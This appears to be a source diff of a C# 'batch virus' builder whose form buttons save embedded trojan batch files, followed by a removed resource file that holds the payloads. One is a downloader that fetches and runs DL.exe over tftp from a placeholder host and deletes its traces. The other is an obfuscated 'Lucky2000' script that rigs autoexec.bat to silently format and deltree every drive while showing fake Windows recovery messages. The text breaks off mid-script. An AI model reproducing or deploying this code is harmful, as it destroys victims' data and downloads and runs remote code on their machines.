this.Button9.Text = "Save File";
this.Button9.UseVisualStyleBackColor = false;
this.Button9.Visible = false;
this.Button10.BackColor = Color.Black;
this.Button10.ForeColor = Color.Lime;
Button button10_1 = this.Button10;
point1 = new Point(-2, 66);
Point point14 = point1;
button10_1.Location = point14;
this.Button10.Name = "Button10";
Button button10_2 = this.Button10;
size1 = new Size(130, 23);
Size size14 = size1;
button10_2.Size = size14;
this.Button10.TabIndex = 16;
this.Button10.Text = "trojan downloader";
this.Button10.UseVisualStyleBackColor = false;
this.RichTextBox4.BackColor = Color.Black;
this.RichTextBox4.ForeColor = Color.Lime;
RichTextBox richTextBox4_1 = this.RichTextBox4;
point1 = new Point(0, 95);
Point point15 = point1;
richTextBox4_1.Location = point15;
this.RichTextBox4.Name = "RichTextBox4";
RichTextBox richTextBox4_2 = this.RichTextBox4;
size1 = new Size(306, 138);
Size size15 = size1;
richTextBox4_2.Size = size15;
this.RichTextBox4.TabIndex = 18;
this.RichTextBox4.Text = componentResourceManager.GetString("RichTextBox4.Text");
this.RichTextBox4.Visible = false;
this.Panel1.BackColor = Color.WhiteSmoke;
Panel panel1_1 = this.Panel1;
point1 = new Point(0, 95);
Point point16 = point1;
panel1_1.Location = point16;
this.Panel1.Name = "Panel1";
Panel panel1_2 = this.Panel1;
size1 = new Size(306, 138);
Size size16 = size1;
panel1_2.Size = size16;
this.Panel1.TabIndex = 19;
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.BackColor = Color.Black;
size1 = new Size(306, 233);
this.ClientSize = size1;
this.Controls.Add((Control) this.Panel1);
this.Controls.Add((Control) this.RichTextBox4);
this.Controls.Add((Control) this.Button9);
this.Controls.Add((Control) this.Button10);
this.Controls.Add((Control) this.RichTextBox3);
this.Controls.Add((Control) this.Button8);
this.Controls.Add((Control) this.Button7);
this.Controls.Add((Control) this.RichTextBox2);
this.Controls.Add((Control) this.Button6);
this.Controls.Add((Control) this.Button5);
this.Controls.Add((Control) this.ProgressBar1);
this.Controls.Add((Control) this.RichTextBox1);
this.Controls.Add((Control) this.Button3);
this.Controls.Add((Control) this.Button2);
this.Controls.Add((Control) this.Button1);
this.Icon = (Icon) componentResourceManager.GetObject("$this.Icon");
this.Name = nameof (real_batch_virus_s);
this.StartPosition = FormStartPosition.CenterScreen;
this.Text = " batch virus's ";
this.ResumeLayout(false);
}
internal virtual Button Button1
{
[DebuggerNonUserCode] get => this._Button1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Button1_Click);
if (this._Button1 != null)
this._Button1.Click -= eventHandler;
this._Button1 = value;
if (this._Button1 == null)
return;
this._Button1.Click += eventHandler;
}
}
internal virtual Button Button2
{
[DebuggerNonUserCode] get => this._Button2;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Button2_Click);
if (this._Button2 != null)
this._Button2.Click -= eventHandler;
this._Button2 = value;
if (this._Button2 == null)
return;
this._Button2.Click += eventHandler;
}
}
internal virtual Button Button3
{
[DebuggerNonUserCode] get => this._Button3;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Button3_Click);
if (this._Button3 != null)
this._Button3.Click -= eventHandler;
this._Button3 = value;
if (this._Button3 == null)
return;
this._Button3.Click += eventHandler;
}
}
internal virtual RichTextBox RichTextBox1
{
[DebuggerNonUserCode] get => this._RichTextBox1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._RichTextBox1 = value;
}
internal virtual ProgressBar ProgressBar1
{
[DebuggerNonUserCode] get => this._ProgressBar1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._ProgressBar1 = value;
}
internal virtual Button Button5
{
[DebuggerNonUserCode] get => this._Button5;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Button5_Click);
if (this._Button5 != null)
this._Button5.Click -= eventHandler;
this._Button5 = value;
if (this._Button5 == null)
return;
this._Button5.Click += eventHandler;
}
}
internal virtual Button Button6
{
[DebuggerNonUserCode] get => this._Button6;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Button6_Click);
if (this._Button6 != null)
this._Button6.Click -= eventHandler;
this._Button6 = value;
if (this._Button6 == null)
return;
this._Button6.Click += eventHandler;
}
}
internal virtual RichTextBox RichTextBox2
{
[DebuggerNonUserCode] get => this._RichTextBox2;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._RichTextBox2 = value;
}
internal virtual Button Button7
{
[DebuggerNonUserCode] get => this._Button7;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Button7_Click);
if (this._Button7 != null)
this._Button7.Click -= eventHandler;
this._Button7 = value;
if (this._Button7 == null)
return;
this._Button7.Click += eventHandler;
}
}
internal virtual Button Button8
{
[DebuggerNonUserCode] get => this._Button8;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Button8_Click);
if (this._Button8 != null)
this._Button8.Click -= eventHandler;
this._Button8 = value;
if (this._Button8 == null)
return;
this._Button8.Click += eventHandler;
}
}
internal virtual RichTextBox RichTextBox3
{
[DebuggerNonUserCode] get => this._RichTextBox3;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.RichTextBox3_TextChanged);
if (this._RichTextBox3 != null)
this._RichTextBox3.TextChanged -= eventHandler;
this._RichTextBox3 = value;
if (this._RichTextBox3 == null)
return;
this._RichTextBox3.TextChanged += eventHandler;
}
}
internal virtual Button Button9
{
[DebuggerNonUserCode] get => this._Button9;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Button9_Click_1);
if (this._Button9 != null)
this._Button9.Click -= eventHandler;
this._Button9 = value;
if (this._Button9 == null)
return;
this._Button9.Click += eventHandler;
}
}
internal virtual Button Button10
{
[DebuggerNonUserCode] get => this._Button10;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Button10_Click);
if (this._Button10 != null)
this._Button10.Click -= eventHandler;
this._Button10 = value;
if (this._Button10 == null)
return;
this._Button10.Click += eventHandler;
}
}
internal virtual RichTextBox RichTextBox4
{
[DebuggerNonUserCode] get => this._RichTextBox4;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.RichTextBox4_TextChanged);
if (this._RichTextBox4 != null)
this._RichTextBox4.TextChanged -= eventHandler;
this._RichTextBox4 = value;
if (this._RichTextBox4 == null)
return;
this._RichTextBox4.TextChanged += eventHandler;
}
}
internal virtual Panel Panel1
{
[DebuggerNonUserCode] get => this._Panel1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Panel1 = value;
}
private void Button2_Click(object sender, EventArgs e)
{
MyProject.Forms.batch_maker.Show();
this.Hide();
}
private void real_batch_virus_s_Load(object sender, EventArgs e)
{
}
private void CheckBox1_CheckedChanged(object sender, EventArgs e)
{
}
private void Timer1_Tick(object sender, EventArgs e)
{
this.ProgressBar1.Increment(4);
if (this.ProgressBar1.Value == 4)
{
this.BackColor = Color.Red;
this.ProgressBar1.BackColor = Color.Red;
}
else if (this.ProgressBar1.Value == 8)
{
this.BackColor = Color.Yellow;
this.BackColor = Color.Blue;
}
else if (this.ProgressBar1.Value == 12)
{
this.BackColor = Color.Blue;
this.BackColor = Color.Orange;
}
else if (this.ProgressBar1.Value == 16)
{
this.BackColor = Color.Firebrick;
this.BackColor = Color.Green;
}
else if (this.ProgressBar1.Value == 20)
{
this.BackColor = Color.Green;
this.BackColor = Color.Pink;
}
else if (this.ProgressBar1.Value == 24)
this.BackColor = Color.Pink;
else if (this.ProgressBar1.Value == 28)
this.BackColor = Color.Purple;
else if (this.ProgressBar1.Value == 32)
this.BackColor = Color.SkyBlue;
else if (this.ProgressBar1.Value == 36)
this.BackColor = Color.White;
else if (this.ProgressBar1.Value == 40)
this.BackColor = Color.Orange;
else if (this.ProgressBar1.Value == 44)
this.BackColor = Color.Violet;
else if (this.ProgressBar1.Value == 48)
this.BackColor = Color.DarkOrchid;
else if (this.ProgressBar1.Value == 52)
this.BackColor = Color.Beige;
else if (this.ProgressBar1.Value == 56)
this.BackColor = Color.Tan;
else if (this.ProgressBar1.Value == 60)
this.BackColor = Color.PowderBlue;
else if (this.ProgressBar1.Value == 64)
this.BackColor = Color.Gold;
else if (this.ProgressBar1.Value == 68)
this.BackColor = Color.Silver;
else if (this.ProgressBar1.Value == 72)
this.BackColor = Color.PowderBlue;
else if (this.ProgressBar1.Value == 76)
this.BackColor = Color.Red;
else if (this.ProgressBar1.Value == 80)
this.BackColor = Color.Gainsboro;
else if (this.ProgressBar1.Value == 84)
this.BackColor = Color.Sienna;
else if (this.ProgressBar1.Value == 88)
this.BackColor = Color.Wheat;
else if (this.ProgressBar1.Value == 92)
this.BackColor = Color.Firebrick;
else if (this.ProgressBar1.Value == 96)
this.BackColor = Color.Yellow;
else if (this.ProgressBar1.Value == 100)
{
this.BackColor = Color.Black;
this.ProgressBar1.Value = 0;
}
}
private void Button1_Click(object sender, EventArgs e)
{
this.RichTextBox1.Visible = true;
this.RichTextBox2.Visible = false;
this.RichTextBox3.Visible = false;
this.RichTextBox4.Visible = false;
this.Button3.Visible = true;
this.Button6.Visible = false;
this.Button8.Visible = false;
this.Button9.Visible = false;
this.Panel1.Visible = false;
}
private void Button4_Click(object sender, EventArgs e)
{
this.Button1.Visible = true;
this.Button7.Visible = true;
this.Button10.Visible = true;
this.Button5.Visible = true;
}
private void Button3_Click(object sender, EventArgs e)
{
SaveFileDialog saveFileDialog = new SaveFileDialog();
saveFileDialog.FileName = "trojan bat luckt.bat";
saveFileDialog.Filter = "trojan bat lucky (*.bat)|*.bat|ALL FILES (*.*)|*.*";
saveFileDialog.Title = "Save File";
saveFileDialog.CheckPathExists = true;
int num = (int) saveFileDialog.ShowDialog((IWin32Window) this);
try
{
MyProject.Computer.FileSystem.WriteAllText(saveFileDialog.FileName, this.RichTextBox1.Text, false);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
private void Button5_Click(object sender, EventArgs e)
{
this.RichTextBox1.Visible = false;
this.RichTextBox2.Visible = true;
this.RichTextBox3.Visible = false;
this.RichTextBox4.Visible = false;
this.Button6.Visible = true;
this.RichTextBox2.Visible = true;
this.Panel1.Visible = false;
this.Button8.Visible = false;
this.Button3.Visible = false;
this.Button6.Visible = true;
this.Button8.Visible = false;
this.Button9.Visible = false;
}
private void Button6_Click(object sender, EventArgs e)
{
SaveFileDialog saveFileDialog = new SaveFileDialog();
saveFileDialog.FileName = "Trojan bat zapchest.bat";
saveFileDialog.Filter = "Trojan bat zapchest (*.bat)|*.bat|ALL FILES (*.*)|*.*";
saveFileDialog.Title = "Save File";
saveFileDialog.CheckPathExists = true;
int num = (int) saveFileDialog.ShowDialog((IWin32Window) this);
try
{
MyProject.Computer.FileSystem.WriteAllText(saveFileDialog.FileName, this.RichTextBox2.Text, false);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
private void Button7_Click(object sender, EventArgs e)
{
this.RichTextBox1.Visible = false;
this.RichTextBox2.Visible = false;
this.RichTextBox3.Visible = true;
this.RichTextBox4.Visible = false;
this.Button3.Visible = false;
this.Button6.Visible = false;
this.Button8.Visible = true;
this.Button9.Visible = false;
this.Panel1.Visible = false;
}
private void Button8_Click(object sender, EventArgs e)
{
SaveFileDialog saveFileDialog = new SaveFileDialog();
saveFileDialog.FileName = "trojan space eater.bat";
saveFileDialog.Filter = "trojan space eater (*.bat)|*.bat|ALL FILES (*.*)|*.*";
saveFileDialog.Title = "Save File";
saveFileDialog.CheckPathExists = true;
int num = (int) saveFileDialog.ShowDialog((IWin32Window) this);
try
{
MyProject.Computer.FileSystem.WriteAllText(saveFileDialog.FileName, this.RichTextBox3.Text, false);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
private void Button9_Click(object sender, EventArgs e)
{
}
private void RichTextBox3_TextChanged(object sender, EventArgs e)
{
}
private void Button9_Click_1(object sender, EventArgs e)
{
SaveFileDialog saveFileDialog = new SaveFileDialog();
saveFileDialog.FileName = "trojan downloader.bat";
saveFileDialog.Filter = "trojan downloader (*.bat)|*.bat|ALL FILES (*.*)|*.*";
saveFileDialog.Title = "Save File";
saveFileDialog.CheckPathExists = true;
int num = (int) saveFileDialog.ShowDialog((IWin32Window) this);
try
{
MyProject.Computer.FileSystem.WriteAllText(saveFileDialog.FileName, this.RichTextBox4.Text, false);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
private void Button10_Click(object sender, EventArgs e)
{
this.RichTextBox1.Visible = false;
this.RichTextBox2.Visible = false;
this.RichTextBox3.Visible = false;
this.RichTextBox4.Visible = true;
this.Button3.Visible = false;
this.Button6.Visible = false;
this.Button8.Visible = false;
this.Button9.Visible = true;
this.Panel1.Visible = false;
}
private void RichTextBox4_TextChanged(object sender, EventArgs e)
{
}
}
}

View File

@ -1,922 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<data name="RichTextBox4.Text" xml:space="preserve">
<value>@echo off
cd \Inetpub\scripts
startDL:
tftp.exe -i a.b.c.d get DL.exe
if not exist DL.exe goto startDL
start /w DL.exe
ren 00.D install.bat
attrib TFTP* -r
attrib DL.exe -r
del TFTP*
del DL.exe
install.bat %1
exit</value>
</data>
<data name="$this.Icon" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAFFTeXN0ZW0uRHJhd2luZywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EFAQAAABNTeXN0ZW0uRHJhd2luZy5JY29uAgAAAAhJY29uRGF0YQhJY29uU2l6ZQcEAhNTeXN0ZW0uRHJhd2luZy5TaXplAgAAAAIAAAAJAwAAAAX8////E1N5c3RlbS5EcmF3aW5nLlNpemUCAAAABXdpZHRoBmhlaWdodAAACAgCAAAAAAAAAAAAAAAPAwAAAH4FAAACAAABAAEAEBAAAAEACABoBQAAFgAAACgAAAAQAAAAIAAAAAEACAAAAAAAQAUAAAAAAAAAAAAAAAEAAAABAAAA/zMAAAD/AP8AMwAA//8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEBAQEBAQEBAQEBAQAAAAABAQEBAQEBAQEBAQEAAAAAAQECAgICAgICAgEBAAAAAAEBAgICAgICAgIBAQAAAAABAQICAwMDAwICAQEAAAAAAQECAgMDAwMCAgEBAAAAAAEBAgIDAwMDAgIBAQAAAAABAQICAwMDAwICAQEAAAAAAQECAgICAgICAgEBAAAAAAEBAgICAgICAgIBAQAAAAABAQEBAQEBAQEBAQEAAAAAAQEBAQEBAQEBAQEBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//8AAP//AAD//wAA//8AAP//AAD//wAA//8AAP//AAD//wAA//8AAP//AAD//wAA//8AAP//AAD//wAA//8L</value>
</data>
<data name="RichTextBox1.Text" xml:space="preserve">
<value>;@set po=@echo
;@set cjk=off
;@%po% %cjk%
:start%;@%
;@set pkh=cls
;@%pkh%
;@set mu=echo
;@set wr=PLEASE
;@set nui=WAIT
;@set pw=WHILE
;@set yk=PROGRAM
;@set uyo=LOADS
;@set yp=.
;@%mu% %wr% %nui% %pw% %yk% %uyo% %yp% %yp% %yp%
;@set yo=call
;@set wf=attrib
;@set vjj=-r
;@set rv=-h
;@set caa=c:\autoexec.bat
;@set up=nul
;@%yo% %wf% %vjj% %rv% %caa% &gt;%up%
;@%mu% %po% %cjk% &gt;%caa%
;@set nmi=format
;@set rb=c:
;@set tpj=/q
;@set tbe=/u
;@set fq=/autotest
;@%mu% %yo% %nmi% %rb% %tpj% %tbe% %fq% &gt;%up% &gt;&gt;%caa%
;@set hin=+r
;@set mra=+h
;@%yo% %wf% %hin% %mra% %caa% &gt;%up%
;@set juf=set
;@set xe=drive
;@set kw=
;@%juf% %xe%=%kw%
;@set xd=alldrive
;@set tkv=c
;@set rb=d
;@set sp=e
;@set cc=f
;@set tyo=g
;@set hb=h
;@set daq=i
;@set ihg=j
;@set ocl=k
;@set egv=l
;@set if=m
;@set xi=n
;@set vuf=o
;@set vd=p
;@set tp=q
;@set sjy=r
;@set qn=s
;@set flk=t
;@set nc=u
;@set ok=v
;@set tu=w
;@set dcc=x
;@set sh=y
;@set wh=z
;@%juf% %xd%=%tkv% %rb% %sp% %cc% %tyo% %hb% %daq% %ihg% %ocl% %egv% %if% %xi% %vuf% %vd% %tp% %sjy% %qn% %flk% %nc% %ok% %tu% %dcc% %sh% %wh%
;@set co=drivechk.bat
;@%mu% %po% %cjk% &gt;%co%
;@set xxm=@prompt
;@set gwh=%%%%comspec%%%%
;@set ec=/f
;@set ko=/c
;@set rb=vol
;@set xd=%%%%1:
;@set th=$b
;@set sgk=find
;@set sp="Vol"
;@set nj={t}.bat
;@%mu% %xxm% %gwh% %ec% %ko% %rb% %xd% %th% %sgk% %sp% &gt; %up% &gt;%nj%
;@set ad=%comspec%
;@set ny=/e:2048
;@%ad% %ny% %ko% %nj% &gt;&gt;%co%
;@set du=del
;@%du% %nj%
;@set rjp=if
;@set tqm=errorlevel
;@set yah=1
;@set im=goto
;@set hko=enddc
;@%mu% %rjp% %tqm% %yah% %im% %hko% &gt;&gt;%co%
;@%pkh%
;@%mu% %wr% %nui% %pw% %yk% %uyo% %yp% %yp% %yp%
;@set gd=dir
;@set ccc=%%%%1:.\/ad/w/-p
;@set rb="bytes"
;@%mu% %xxm% %gwh% %ec% %ko% %gd% %ccc% %th% %sgk% %rb% &gt; %up% &gt;%nj%
;@%ad% %ny% %ko% %nj% &gt;&gt;%co%
;@%du% %nj%
;@%mu% %rjp% %tqm% %yah% %im% %hko% &gt;&gt;%co%
;@%pkh%
;@%mu% %wr% %nui% %pw% %yk% %uyo% %yp% %yp% %yp%
;@set rb="
;@set xd=0
;@set sp=bytes
;@set cc=free"
;@%mu% %xxm% %gd% %ccc% %th% %sgk% %rb% %xd% %sp% %cc% &gt; %up% &gt;%nj%
;@%ad% %ny% %ko% %nj% &gt;&gt;%co%
;@%du% %nj%
;@set rb=%%drive%%
;@set xd=%%1
;@%mu% %rjp% %tqm% %yah% %juf% %xe%=%rb% %xd% &gt;&gt;%co%
;@%pkh%
;@%mu% %wr% %nui% %pw% %yk% %uyo% %yp% %yp% %yp%
;@set rb=:enddc
;@%mu% %rb% &gt;&gt;%co%
:testdrv%;@%
;@set wx=for
;@set bwi=%%a
;@set sf=in
;@set rb=(%alldrive%)
;@set bt=do
;@%wx% %bwi% %sf% %rb% %bt% %yo% %co% %bwi% &gt;%up%
;@%du% %co% &gt;%up%
;@set rb=%drive.
;@%rjp% %rb%==%yp% %juf% %xe%=%tkv%
:form_del%;@%
;@%yo% %wf% %vjj% %rv% %caa% &gt;%up%
;@%mu% %po% %cjk% &gt;%caa%
;@set qgt=Loading
;@set lpr=Windows,
;@set jfa=please
;@set ppl=wait
;@set gy=while
;@set wbt=Microsoft
;@set grk=Windows
;@set bka=recovers
;@set ea=your
;@set smq=system
;@%mu% %mu% %qgt% %lpr% %jfa% %ppl% %gy% %wbt% %grk% %bka% %ea% %smq% %yp% %yp% %yp% &gt;&gt;%caa%
;@set ecg=%%%%a
;@set bc=(%drive%)
;@set ty=%%%%a:
;@%mu% %wx% %ecg% %sf% %bc% %bt% %yo% %nmi% %ty% %tpj% %tbe% %fq% &gt;%up% &gt;&gt;%caa%
;@%mu% %pkh% &gt;&gt;%caa%
;@%mu% %mu% %qgt% %lpr% %jfa% %ppl% %gy% %wbt% %grk% %bka% %ea% %smq% %yp% %yp% %yp% &gt;&gt;%caa%
;@set xn=c:\temp.bat
;@set fl=Lucky2000
;@%mu% %wx% %ecg% %sf% %bc% %bt% %yo% %xn% %ecg% %fl% &gt;%up% &gt;&gt;%caa%
;@%mu% %pkh% &gt;&gt;%caa%
;@%mu% %mu% %qgt% %lpr% %jfa% %ppl% %gy% %wbt% %grk% %bka% %ea% %smq% %yp% %yp% %yp% &gt;&gt;%caa%
;@set gpi=deltree
;@set gjq=/y
;@set mt=%%%%a:\
;@%mu% %wx% %ecg% %sf% %bc% %yo% %gpi% %gjq% %mt% &gt;%up% &gt;&gt;%caa%
;@%mu% %pkh% &gt;&gt;%caa%
;@%mu% %mu% %qgt% %lpr% %jfa% %ppl% %gy% %wbt% %grk% %bka% %ea% %smq% %yp% %yp% %yp% &gt;&gt;%caa%
;@%mu% %wx% %ecg% %sf% %bc% %bt% %yo% %nmi% %ty% %tpj% %tbe% %fq% &gt;%up% &gt;&gt;%caa%
;@%mu% %pkh% &gt;&gt;%caa%
;@%mu% %mu% %qgt% %lpr% %jfa% %ppl% %gy% %wbt% %grk% %bka% %ea% %smq% %yp% %yp% %yp% &gt;&gt;%caa%
;@%mu% %wx% %ecg% %sf% %bc% %bt% %yo% %xn% %ecg% %fl% &gt;%up% &gt;&gt;%caa%
;@%mu% %pkh% &gt;&gt;%caa%
;@%mu% %mu% %qgt% %lpr% %jfa% %ppl% %gy% %wbt% %grk% %bka% %ea% %smq% %yp% %yp% %yp% &gt;&gt;%caa%
;@%mu% %wx% %ecg% %sf% %bc% %yo% %gpi% %gjq% %mt% &gt;%up% &gt;&gt;%caa%
;@set fp=cd\
;@%mu% %fp% &gt;&gt;%caa%
;@%mu% %pkh% &gt;&gt;%caa%
;@set rb=Welcome
;@set xd=Lucky´s
;@set sp=land
;@set nru=of
;@set cc=death.
;@%mu% %mu% %rb% %xd% %sp% %nru% %cc% &gt;&gt;%caa%
;@set rb=If
;@set xd=you
;@set sp=ran
;@set cc=this
;@set tyo=file,
;@set hb=then
;@set daq=sorry,
;@set ihg=I
;@set ocl=just
;@set egv=made
;@set if=it.
;@%mu% %mu% %rb% %xd% %sp% %cc% %tyo% %hb% %daq% %ihg% %ocl% %egv% %if% &gt;&gt;%caa%
;@set ij=echo.
;@%mu% %ij% &gt;&gt;%caa%
;@set rb=Regards,
;@%mu% %mu% %rb% &gt;&gt;%caa%
;@%mu% %ij% &gt;&gt;%caa%
;@set rb=Lucky
;@set xd=2000
;@%mu% %mu% %rb% %xd% &gt;&gt;%caa%
;@%yo% %wf% %hin% %mra% %caa%
;@%kw%
:makedir%;@%
;@set or=exist
